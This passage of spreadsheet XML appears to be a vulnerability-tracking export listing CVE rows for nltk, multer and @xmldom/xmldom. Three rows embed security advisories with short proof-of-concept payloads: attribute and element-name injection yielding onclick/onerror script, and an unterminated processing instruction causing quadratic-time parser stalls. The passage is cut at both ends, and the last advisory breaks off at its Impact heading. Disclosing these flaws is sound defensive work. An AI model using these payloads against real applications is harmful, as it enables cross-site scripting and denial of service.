      <c r="E1044" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1044" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1044" s="5" t="inlineStr"/>
      <c r="H1044" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1044" s="5" t="inlineStr"/>
      <c r="J1044" s="5" t="inlineStr"/>
      <c r="K1044" s="5" t="inlineStr"/>
      <c r="L1044" s="5" t="inlineStr">
        <is>
          <t>PyPI:nltk</t>
        </is>
      </c>
      <c r="M1044" s="5" t="inlineStr">
        <is>
          <t>3.10.3</t>
        </is>
      </c>
      <c r="N1044" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1044" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1044" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1044" s="5" t="inlineStr"/>
      <c r="R1044" s="5" t="inlineStr"/>
      <c r="S1044" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T1044" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78681</t>
        </is>
      </c>
    </row>
    <row r="1045">
      <c r="A1045" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1045" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1045" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78682</t>
        </is>
      </c>
      <c r="D1045" s="5" t="inlineStr"/>
      <c r="E1045" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1045" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1045" s="5" t="inlineStr"/>
      <c r="H1045" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1045" s="5" t="inlineStr"/>
      <c r="J1045" s="5" t="inlineStr"/>
      <c r="K1045" s="5" t="inlineStr"/>
      <c r="L1045" s="5" t="inlineStr">
        <is>
          <t>PyPI:nltk</t>
        </is>
      </c>
      <c r="M1045" s="5" t="inlineStr">
        <is>
          <t>3.10.3</t>
        </is>
      </c>
      <c r="N1045" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1045" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1045" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1045" s="5" t="inlineStr"/>
      <c r="R1045" s="5" t="inlineStr"/>
      <c r="S1045" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T1045" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78682</t>
        </is>
      </c>
    </row>
    <row r="1046">
      <c r="A1046" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1046" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1046" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78683</t>
        </is>
      </c>
      <c r="D1046" s="5" t="inlineStr"/>
      <c r="E1046" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F1046" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1046" s="5" t="inlineStr"/>
      <c r="H1046" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1046" s="5" t="inlineStr"/>
      <c r="J1046" s="5" t="inlineStr"/>
      <c r="K1046" s="5" t="inlineStr"/>
      <c r="L1046" s="5" t="inlineStr">
        <is>
          <t>PyPI:nltk</t>
        </is>
      </c>
      <c r="M1046" s="5" t="inlineStr">
        <is>
          <t>3.10.0</t>
        </is>
      </c>
      <c r="N1046" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1046" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1046" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1046" s="5" t="inlineStr"/>
      <c r="R1046" s="5" t="inlineStr"/>
      <c r="S1046" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T1046" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78683</t>
        </is>
      </c>
    </row>
    <row r="1047">
      <c r="A1047" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1047" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1047" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79657</t>
        </is>
      </c>
      <c r="D1047" s="5" t="inlineStr"/>
      <c r="E1047" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F1047" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1047" s="5" t="inlineStr"/>
      <c r="H1047" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I1047" s="5" t="inlineStr"/>
      <c r="J1047" s="5" t="inlineStr"/>
      <c r="K1047" s="5" t="inlineStr"/>
      <c r="L1047" s="5" t="inlineStr">
        <is>
          <t>PyPI:nltk</t>
        </is>
      </c>
      <c r="M1047" s="5" t="inlineStr">
        <is>
          <t>3.10.3</t>
        </is>
      </c>
      <c r="N1047" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1047" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1047" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1047" s="5" t="inlineStr"/>
      <c r="R1047" s="5" t="inlineStr"/>
      <c r="S1047" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T1047" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79657</t>
        </is>
      </c>
    </row>
    <row r="1048">
      <c r="A1048" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1048" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1048" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79674</t>
        </is>
      </c>
      <c r="D1048" s="5" t="inlineStr"/>
      <c r="E1048" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1048" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1048" s="5" t="inlineStr"/>
      <c r="H1048" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1048" s="5" t="inlineStr"/>
      <c r="J1048" s="5" t="inlineStr"/>
      <c r="K1048" s="5" t="inlineStr"/>
      <c r="L1048" s="5" t="inlineStr">
        <is>
          <t>PyPI:nltk</t>
        </is>
      </c>
      <c r="M1048" s="5" t="inlineStr">
        <is>
          <t>3.10.3</t>
        </is>
      </c>
      <c r="N1048" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1048" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1048" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1048" s="5" t="inlineStr"/>
      <c r="R1048" s="5" t="inlineStr"/>
      <c r="S1048" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T1048" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79674</t>
        </is>
      </c>
    </row>
    <row r="1049">
      <c r="A1049" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1049" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1049" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79676</t>
        </is>
      </c>
      <c r="D1049" s="5" t="inlineStr"/>
      <c r="E1049" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1049" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1049" s="5" t="inlineStr"/>
      <c r="H1049" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1049" s="5" t="inlineStr"/>
      <c r="J1049" s="5" t="inlineStr"/>
      <c r="K1049" s="5" t="inlineStr"/>
      <c r="L1049" s="5" t="inlineStr">
        <is>
          <t>PyPI:nltk</t>
        </is>
      </c>
      <c r="M1049" s="5" t="inlineStr">
        <is>
          <t>3.10.3</t>
        </is>
      </c>
      <c r="N1049" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1049" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1049" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1049" s="5" t="inlineStr"/>
      <c r="R1049" s="5" t="inlineStr"/>
      <c r="S1049" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T1049" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79676</t>
        </is>
      </c>
    </row>
    <row r="1050">
      <c r="A1050" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1050" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1050" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80205</t>
        </is>
      </c>
      <c r="D1050" s="5" t="inlineStr"/>
      <c r="E1050" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1050" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1050" s="5" t="inlineStr"/>
      <c r="H1050" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I1050" s="5" t="inlineStr"/>
      <c r="J1050" s="5" t="inlineStr"/>
      <c r="K1050" s="5" t="inlineStr"/>
      <c r="L1050" s="5" t="inlineStr">
        <is>
          <t>PyPI:nltk</t>
        </is>
      </c>
      <c r="M1050" s="5" t="inlineStr">
        <is>
          <t>3.10.0</t>
        </is>
      </c>
      <c r="N1050" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1050" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1050" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1050" s="5" t="inlineStr"/>
      <c r="R1050" s="5" t="inlineStr"/>
      <c r="S1050" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T1050" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80205</t>
        </is>
      </c>
    </row>
    <row r="1051">
      <c r="A1051" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1051" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1051" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80206</t>
        </is>
      </c>
      <c r="D1051" s="5" t="inlineStr"/>
      <c r="E1051" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1051" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1051" s="5" t="inlineStr"/>
      <c r="H1051" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1051" s="5" t="inlineStr"/>
      <c r="J1051" s="5" t="inlineStr"/>
      <c r="K1051" s="5" t="inlineStr"/>
      <c r="L1051" s="5" t="inlineStr">
        <is>
          <t>PyPI:nltk</t>
        </is>
      </c>
      <c r="M1051" s="5" t="inlineStr">
        <is>
          <t>3.10.3</t>
        </is>
      </c>
      <c r="N1051" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1051" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1051" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1051" s="5" t="inlineStr"/>
      <c r="R1051" s="5" t="inlineStr"/>
      <c r="S1051" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T1051" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80206</t>
        </is>
      </c>
    </row>
    <row r="1052">
      <c r="A1052" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1052" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1052" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82333</t>
        </is>
      </c>
      <c r="D1052" s="5" t="inlineStr"/>
      <c r="E1052" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1052" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1052" s="5" t="inlineStr"/>
      <c r="H1052" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1052" s="5" t="inlineStr"/>
      <c r="J1052" s="5" t="inlineStr"/>
      <c r="K1052" s="5" t="inlineStr"/>
      <c r="L1052" s="5" t="inlineStr">
        <is>
          <t>npm:multer</t>
        </is>
      </c>
      <c r="M1052" s="5" t="inlineStr">
        <is>
          <t>2.3.0</t>
        </is>
      </c>
      <c r="N1052" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1052" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1052" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1052" s="5" t="inlineStr"/>
      <c r="R1052" s="5" t="inlineStr"/>
      <c r="S1052" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T1052" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82333</t>
        </is>
      </c>
    </row>
    <row r="1053">
      <c r="A1053" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1053" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1053" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83605</t>
        </is>
      </c>
      <c r="D1053" s="5" t="inlineStr"/>
      <c r="E1053" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1053" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1053" s="5" t="inlineStr"/>
      <c r="H1053" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1053" s="5" t="inlineStr"/>
      <c r="J1053" s="5" t="inlineStr"/>
      <c r="K1053" s="5" t="inlineStr"/>
      <c r="L1053" s="5" t="inlineStr">
        <is>
          <t>npm:@xmldom/xmldom, npm:xmldom</t>
        </is>
      </c>
      <c r="M1053" s="5" t="inlineStr">
        <is>
          <t>0.8.14, 0.9.11</t>
        </is>
      </c>
      <c r="N1053" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1053" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1053" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1053" s="5" t="inlineStr"/>
      <c r="R1053" s="5" t="inlineStr"/>
      <c r="S1053" s="5" t="inlineStr">
        <is>
          <t>## Summary
`Element.setAttribute()` in `@xmldom/xmldom` bypasses attribute name validation by calling the private `_createAttribute(name)` method, which performs no validation. The public `createAttribute()` method correctly validates names against an anchored `QName` pattern, but `setAttribute()` never uses it. The serializer escapes attribute *values* but trusts attribute *names*, allowing an attacker to inject additional attributes (including event handlers) into serialized output. The `requireWellFormed: true` option did not catch this.
## Details
`Element.setAttribute(name, value)` creates attribute nodes by calling the private `_createAttribute(name)` method, which performs no validation on the `name` parameter. In contrast, the public `Document.createAttribute(name)` method validates the name against the `QName` production before creating the attribute node.
The result is a two-tier validation system where the most commonly used API (`setAttribute`) takes the unvalidated path:
- `doc.createAttribute("bad name")` — throws `INVALID_CHARACTER_ERR` (correct).
- `el.setAttribute("bad name", "value")` — succeeds silently (vulnerable).
The serializer emits attribute names verbatim into the output. Because attribute values ARE escaped (quotes, ampersands, etc.), the injection must occur through the name. An attacker can terminate the current attribute and inject new ones by including quote and space characters in the attribute name.
### Root Cause
1. `setAttribute()` calls `_createAttribute()` (private, no validation) instead of `createAttribute()` (public, validates against `QName`).
2. The serializer trusts attribute names and emits them unescaped.
3. The serializer's `requireWellFormed` code path did not validate attribute names during serialization.
## Proof of Concept
```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const impl = new DOMImplementation();
const serializer = new XMLSerializer();
const doc = impl.createDocument(null, 'root', null);
// The attribute name contains a closing quote, a space, and a new attribute
doc.documentElement.setAttribute('class="safe" onclick', 'alert(1)');
const output = serializer.serializeToString(doc, { requireWellFormed: true });
console.log(output);
// &lt;root class="safe" onclick="alert(1)"/&gt;
//
// The single setAttribute() call produced TWO attributes:
//   1. class="safe"
//   2. onclick="alert(1)"
//
// requireWellFormed: true did NOT prevent the injection.
```
### Demonstrating the validation gap
```js
// Public createAttribute correctly rejects invalid names:
try {
  doc.createAttribute('class="safe" onclick');
} catch (e) {
  console.log('createAttribute rejects:', e.message);
}
// But setAttribute (which uses _createAttribute) accepts the same input:
doc.documentElement.setAttribute('class="safe" onclick', 'alert(1)');
// No error thrown
```
## Impact
Applications that use `setAttribute()` with any user-controlled portion of the attribute name are vulnerable to attribute injection attacks. This includes:
- **Cross-Site Scripting (XSS)**: Injecting event handler attributes into HTML output consumed by browsers.
- **Security attribute override**: Overriding security-relevant attributes such as `integrity`, `nonce`, `sandbox`, or `Content-Security-Policy` meta attributes.
- **Validation bypass**: The public `createAttribute()` API validates while `setAttribute()` does not, creating an inconsistent security boundary that developers cannot rely on.
- **requireWellFormed bypass**: Applications that adopted `requireWellFormed: true` as a mitigation for prior CVEs remained vulnerable.
`@xmldom/xmldom` can also be used inside browsers, where it mirrors the DOM API. Unlike the browser's `setAttribute()`, which rejects an invalid attribute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serialized attribute's qualified name against the XML `QName` production and throws `InvalidStateError` before emitting it. This covers ordinary attribute names **and** synthesized `xmlns:PREFIX` namespace declarations (the namespace-prefix sub-vector).
Fixed under `requireWellFormed: true` in `@xmldom/xmldom` **0.9.11** and **0.8.14**. Default serialization is unchanged.
### PoC — fixed path
```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const doc = new DOMImplementation().createDocument(null, 'root', null);
doc.documentElement.setAttribute('class="safe" onclick', 'alert(1)');
// Default (unchanged): verbatim — injection present
console.log(new XMLSerializer().serializeToString(doc));
// &lt;root class="safe" onclick="alert(1)"/&gt;
// Opt-in guard: throws InvalidStateError before serializing
try {
  new XMLSerializer().serializeToString(doc, { requireWellFormed: true });
} catch (e) {
  console.log(e.name, e.message);
  // InvalidStateError: The attribute name "class="safe" onclick" is not a valid XML QName
}
```
### Why the default stays verbatim
The W3C DOM Parsing and Serialization spec defines a `require well-formed` flag whose **default value is `false`**. With the flag unset, the serializer emits attribute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`setAttribute(name, value)` does not validate `name` at creation time (unlike the public `createAttribute()`, which already does). Making `setAttribute()` reject invalid names unconditionally is a breaking change and is deferred to the next breaking release. When the default serialization path is used (without `requireWellFormed: true`), attribute names set via `setAttribute()` are still emitted verbatim; applications that do not pass `requireWellFormed: true` remain exposed.
Creation-time validation is tracked in a public issue on the next breaking-release milestone (filed at publication — issue link to be added), targeting the next breaking release.</t>
        </is>
      </c>
      <c r="T1053" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83605</t>
        </is>
      </c>
    </row>
    <row r="1054">
      <c r="A1054" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1054" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1054" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83606</t>
        </is>
      </c>
      <c r="D1054" s="5" t="inlineStr"/>
      <c r="E1054" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1054" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1054" s="5" t="inlineStr"/>
      <c r="H1054" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1054" s="5" t="inlineStr"/>
      <c r="J1054" s="5" t="inlineStr"/>
      <c r="K1054" s="5" t="inlineStr"/>
      <c r="L1054" s="5" t="inlineStr">
        <is>
          <t>npm:@xmldom/xmldom</t>
        </is>
      </c>
      <c r="M1054" s="5" t="inlineStr">
        <is>
          <t>0.9.11</t>
        </is>
      </c>
      <c r="N1054" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1054" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1054" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1054" s="5" t="inlineStr"/>
      <c r="R1054" s="5" t="inlineStr"/>
      <c r="S1054" s="5" t="inlineStr">
        <is>
          <t>## Summary
`@xmldom/xmldom`'s processing-instruction (PI) grammar regex exhibits quadratic-time backtracking
(ReDoS) when parsing an **unterminated** processing instruction. A single small XML document
containing `&lt;?` + a target + a long run of whitespace and no closing `?&gt;` forces the regular
expression engine into O(n²) work, stalling the Node.js event loop. The input is parsed with
`DOMParser.parseFromString` under **default options**, so it is reachable from unauthenticated,
network-delivered XML (SOAP/SAML, webhooks, uploads, XML APIs).
## Details
The PI production in `lib/grammar.js` compiles (flags `mu`) to:
```
^&lt;\?(NameChars)(?:[\x20\x09\x0D\x0A]+([Char]*?))?\?&gt;
                     ^^^ S+ greedy       ^^^ Char*? lazy
```
- `lib/grammar.js` line 261: https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/grammar.js#L261
In the optional tail `(?:S+(Char*?))?`, both the greedy separator `S+` and the lazy data `Char*?`
match XML whitespace. When the required trailing `?&gt;` is absent, the engine must ultimately fail —
but first it tries every partition of the whitespace run between `S+` and `Char*?`, which is O(n²)
in the length of the trailing whitespace.
The regex is executed against the **entire remaining source string** in two places in `lib/sax.js`,
so the whole whitespace tail is scanned:
- `parsePI` — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/sax.js#L680-L691
- `parseProcessingInstruction` — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/sax.js#L862-L879
## Affected Versions
Only the `0.9.x` line is affected. `lib/grammar.js` (and this PI regex) was introduced in
commit `726b471` ("fix!: preserve DOCTYPE internal subset (#498)"), first released in
**0.9.0-beta.9**, and is unchanged through **0.9.10**.
The `0.8.x` line (≤ 0.8.13) and the unscoped `xmldom` package (≤ 0.6.0) parse PIs via a different
code path bounded by `indexOf('?&gt;')` — they do **not** contain this regex and are **not affected**
by this issue. (They were not separately tested for a *different* PI ReDoS; the scope here is the
specific `grammar.js` regex.)
| Line | PI code path | Affected? |
|---|---|---|
| `0.9.x` (0.9.0-beta.9 … 0.9.10) | `grammar.js` `PI` regex over full remaining source | **Yes** |
| `0.8.x` (≤ 0.8.13) | `parseInstruction`, bounded by `indexOf('?&gt;')` | No |
| unscoped `xmldom` (≤ 0.6.0) | older `indexOf('?&gt;')`-bounded parsing | No |
## Proof of Concept
```js
const { DOMParser } = require('@xmldom/xmldom');
const n = 32 * 1024;
const payload = '&lt;a&gt;&lt;?p' + ' '.repeat(n); // unterminated PI, no `?&gt;`
console.time('parse');
new DOMParser().parseFromString(payload, 'text/xml');
console.timeEnd('parse');
```
Measured (Node 18), trailing whitespace after `&lt;?p`, no `?&gt;` — time quadruples per doubling of
input length (canonical O(n²)):
| Trailing whitespace | `g.PI.exec` | `parseFromString` |
|---|---|---|
| 2 KB  | 4.4 ms    | 5.1 ms   |
| 4 KB  | 16.9 ms   | 17.0 ms  |
| 8 KB  | 111.4 ms  | 66.3 ms  |
| 16 KB | 263.8 ms  | 336.5 ms |
| 32 KB | 1073.1 ms | —        |
## Impact
Availability only: a single parse of a small crafted document blocks the Node.js event loop for the
duration of the quadratic scan (≈1 s at 32 KB; multi-second with larger inputs). No memory blow-up,
no data exposure, no integrity impact. Because XML is routinely accepted from untrusted sources and
parsed with default options, one request can stall a server.
## Fix Applied
Fixed in `@xmldom/xmldom` **0.9.11** (`0.9.x`-only; the `0.8.x` LTS line and the
unscoped `xmldom` package use a different, bounded PI code path and are not affected).
PR [#1039](https://github.com/xmldom/xmldom/pull/1039) inserts a fixed-width negative lookahead
`(?!\s)` immediately after the greedy `S+`, so the separator can no longer hand whitespace back to
the lazy data group:
```
- var PI = reg(/^&lt;\?/, '(', Name, ')', regg(S, '(', Char, '*?)'), '?', /\?&gt;/);
+ var PI = reg(/^&lt;\?/, '(', Name, ')', regg(S, '(?!', _SChar, ')(', Char, '*?)'), '?', /\?&gt;/);
```
The change is correct, minimal, and behavior-preserving: it produces identical `[target, data]`
captures on all valid PIs tested (incl. whitespace-heavy, tab/newline, empty-data, and xml-decl
cases) and removes the backtracking blow-up (linear, ~0.4 ms at 128 KB after the fix). The lookahead
is fixed-width and cannot itself backtrack — a strict improvement with no new parsing risk.
## Severity note
The complexity is **quadratic**, not exponential, so a multi-second stall requires
tens-to-hundreds of KB of input. `VA:H` reflects that xmldom applies **no input-size limit** and the
path runs on default-options parsing, so a single unbounded parse can fully stall the event loop.</t>
        </is>
      </c>
      <c r="T1054" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83606</t>
        </is>
      </c>
    </row>
    <row r="1055">
      <c r="A1055" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1055" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1055" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83607</t>
        </is>
      </c>
      <c r="D1055" s="5" t="inlineStr"/>
      <c r="E1055" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1055" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1055" s="5" t="inlineStr"/>
      <c r="H1055" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1055" s="5" t="inlineStr"/>
      <c r="J1055" s="5" t="inlineStr"/>
      <c r="K1055" s="5" t="inlineStr"/>
      <c r="L1055" s="5" t="inlineStr">
        <is>
          <t>npm:@xmldom/xmldom, npm:xmldom</t>
        </is>
      </c>
      <c r="M1055" s="5" t="inlineStr">
        <is>
          <t>0.8.14, 0.9.11</t>
        </is>
      </c>
      <c r="N1055" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1055" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1055" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1055" s="5" t="inlineStr"/>
      <c r="R1055" s="5" t="inlineStr"/>
      <c r="S1055" s="5" t="inlineStr">
        <is>
          <t>## Summary
`Document.createElement()` in `@xmldom/xmldom` accepts arbitrary strings as the `tagName` parameter with zero validation. The serializer emits the tag name verbatim into XML/HTML output. Critically, the `requireWellFormed: true` serializer option — the recommended mitigation from CVE-2026-41672, CVE-2026-41674, and CVE-2026-34601 — did NOT catch this, making it a bypass of the existing security controls.
An attacker who controls the element name string can inject arbitrary attributes (including event handlers) into the serialized output, leading to XSS when the output is consumed by a browser or downstream parser.
## Details
`Document.createElement()` accepts any string as `tagName` and stores it directly on the element node without validation. When the document is later serialized via `XMLSerializer.serializeToString()`, the serializer emits the `tagName` verbatim into the output.
The XML specification requires element names to conform to the `Name` production. The existing `createAttributeNS()` and `createElementNS()` methods validate qualified names against an anchored name/`QName` pattern, but `createElement()` bypasses this entirely, and the `requireWellFormed: true` serializer path performed no element-name validation — rendering it ineffective against this vector.
### Root Cause
1. `createElement()` stores the raw `tagName` string without any validation.
2. The serializer's `requireWellFormed` code path did not validate element names against the XML `Name`/`QName` production.
3. The serializer emits `tagName` directly into angle brackets: `&lt;${tagName}...&gt;`.
## Proof of Concept
```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const impl = new DOMImplementation();
const serializer = new XMLSerializer();
const doc = impl.createDocument(null, 'root', null);
// Inject an element whose "name" contains attributes with an XSS payload
const el = doc.createElement('img src=x onerror="alert(1)"');
doc.documentElement.appendChild(el);
const output = serializer.serializeToString(doc, { requireWellFormed: true });
console.log(output);
// &lt;root&gt;&lt;img src=x onerror="alert(1)"/&gt;&lt;/root&gt;
//
// A browser parsing this HTML will execute alert(1).
// requireWellFormed: true did NOT prevent the injection.
```
## Impact
